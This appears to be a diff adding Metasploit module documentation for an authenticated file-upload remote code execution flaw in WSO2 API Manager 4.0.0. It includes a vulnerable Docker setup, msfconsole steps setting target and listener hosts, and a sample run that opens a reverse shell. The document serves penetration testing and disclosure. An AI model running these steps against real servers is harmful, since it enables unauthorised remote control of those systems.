|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +A vulnerability in the 'Add API Documentation' feature allows malicious users with specific permissions |
| 4 | +(`/permission/admin/login` and `/permission/admin/manage/api/publish`) to upload arbitrary files to a user-controlled |
| 5 | +server location. This flaw could be exploited to execute remote code, enabling an attacker to gain control over the server. |
| 6 | + |
| 7 | +```yaml |
| 8 | +services: |
| 9 | + api-manager: |
| 10 | + image: wso2/wso2am:4.0.0-alpine |
| 11 | + container_name: swo2_api_manager |
| 12 | + ports: |
| 13 | + - "9443:9443" |
| 14 | + |
| 15 | +``` |
| 16 | + |
| 17 | +```bash |
| 18 | +docker-compose up |
| 19 | +``` |
| 20 | +## Verification Steps |
| 21 | + |
| 22 | +1. Install the application |
| 23 | +1. Start msfconsole |
| 24 | +1. Do: `use multi/http/wso2_api_manager_file_upload_rce` |
| 25 | +1. Do: `set rhosts [ip]` |
| 26 | +1. Do: `set lhost [ip]` |
| 27 | +1. Do: `run` |
| 28 | +1. You should get a shell. |
| 29 | + |
| 30 | +## Scenarios |
| 31 | + |
| 32 | +### WSO2 API Manager 4.0.0 |
| 33 | +``` |
| 34 | +msf6 exploit(multi/http/wso2_api_manager_file_upload_rce) > exploit |
| 35 | +
|
| 36 | +[*] Started reverse TCP handler on 0.0.0.0:4444 |
| 37 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 38 | +[*] Checking target... |
| 39 | +[+] Authentication successful |
| 40 | +[+] The target appears to be vulnerable. Detected WSO2 API Manager 4.0.0 which is vulnerable. |
| 41 | +[+] Authentication successful |
| 42 | +[*] Listing APIs... |
| 43 | +[+] Document created successfully |
| 44 | +[*] Uploading payload... |
| 45 | +[+] Payload uploaded successfully |
| 46 | +[*] Executing payload... |
| 47 | +[+] Payload executed successfully |
| 48 | +[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:58206) at 2024-11-03 15:36:37 +0100 |
| 49 | +
|
| 50 | +id |
| 51 | +uid=802(wso2carbon) gid=802(wso2) groups=802(wso2) |
| 52 | +pwd |
| 53 | +/home/wso2carbon/wso2am-4.0.0 |
| 54 | +exit |
| 55 | +[*] 127.0.0.1 - Command shell session 2 closed. |
| 56 | +``` |
| 57 | + |
| 58 | +## Options |
| 59 | + |
| 60 | +### HttpUsername (required) |
| 61 | + |
| 62 | +The username to authenticate with. |
| 63 | + |
| 64 | +### HttpPassword (required) |
| 65 | + |
| 66 | +The password of the user to authenticate with. |
| 67 | + |
| 68 | +### RHOSTS (required) |
| 69 | + |
| 70 | +The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html |
| 71 | + |
| 72 | +### RPORT (required) |
| 73 | + |
| 74 | +The target port (TCP) |
0 commit comments